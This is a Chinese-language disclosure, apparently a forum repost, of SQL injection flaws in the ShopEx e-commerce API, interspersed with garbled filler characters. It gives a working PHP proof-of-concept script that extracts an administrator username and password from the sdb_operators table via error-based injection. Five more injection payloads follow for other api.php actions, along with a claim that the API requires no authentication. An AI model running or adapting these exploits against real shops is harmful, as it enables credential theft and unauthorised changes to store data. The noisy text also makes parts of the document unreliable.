|
|
缺陷文件:\core\api\payment\2.0\api_b2b_2_0_payment_cfg.php
" }( C. r" f( z5 D2 ucore\api\payment\1.0\api_b2b_2_0_payment_cfg.php3 B/ a. x; X9 G ] ~
9 `" Z# i: F" E( g7 I
第44行 $data['columns'] 未做过滤导致注入
) i' [+ X5 m4 x# h7 G) ] r; F: d u9 l/ P1 D$ t4 {
<?php set_time_limit(0); ob_flush(); echo 'Test: http://localhost:808'."\r\n"; $sql = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select (select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&disabled=1'; $url='http://localhost:808/api.php?act=search_payment_cfg_list&api_version=2.0'; $ch = curl_init(); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POSTFIELDS, $sql); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); flush(); $data = curl_exec($ch); echo $data; curl_close($ch); ?>外带一句 ShopEx对API操作的模块未做认证,任何用户都可访问,攻击者可通过它来对产品的分类,类型,规格,品牌等,进行添加,删除和修改,过滤不当还可造成注入.
B- e4 n$ A5 u7 G7 j9 E) q3 i, \3 z/ ~) u4 \4 n0 ~
注射1:
) E# [9 B m3 X
! X! s* s X: y3 z. rhttp://www.0day5.com/api.php POST act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#
A3 Y" G. e6 g/ \
9 J' p1 H4 W6 p注射2:
; G1 k1 t1 r; J) X j, m/ d/ q4 p: Yhttp://www.0day5.com/shopex/api.php act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"}
; @/ r5 z& y- H: ?1 }( R$ [2 w Y2 ]% A* ~8 Q" P
注射3:
" A* K( \& |; s4 g; N0 w5 A0 k http://www.0day5.com/shopex/api.php act=get_spec_single&api_version=3.1&spec_id=1 xxx( }+ H' |& @! H }) J/ a2 z
注射4:; Z$ N* L# S# a, A5 n
& ^. O$ H7 f. ~http://www.0day5.com/shopex/api.php act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1¤cy=16 h0 w4 a l9 _
9 o, P0 c" E2 j9 x' F9 C
9 j" J) `' e5 z! }注射5:
' J* n5 K9 M" _5 L" C http://www.0day5.com/shopex/api.php act=search_dly_h_area&return_data=string&columns=xxxxx" b A& m) T4 [) V3 d
" p3 r6 b5 Q/ k3 b* g3 V+ ?$ S
0 q8 w( w1 A5 v$ ? @( d: c5 ~0 F" ?
/ ?/ u* B: l" A5 R5 P2 Z
& b$ j Y+ u5 G. X& }9 y
* ]" C1 t) o0 R' P y5 N8 d7 `( F |
|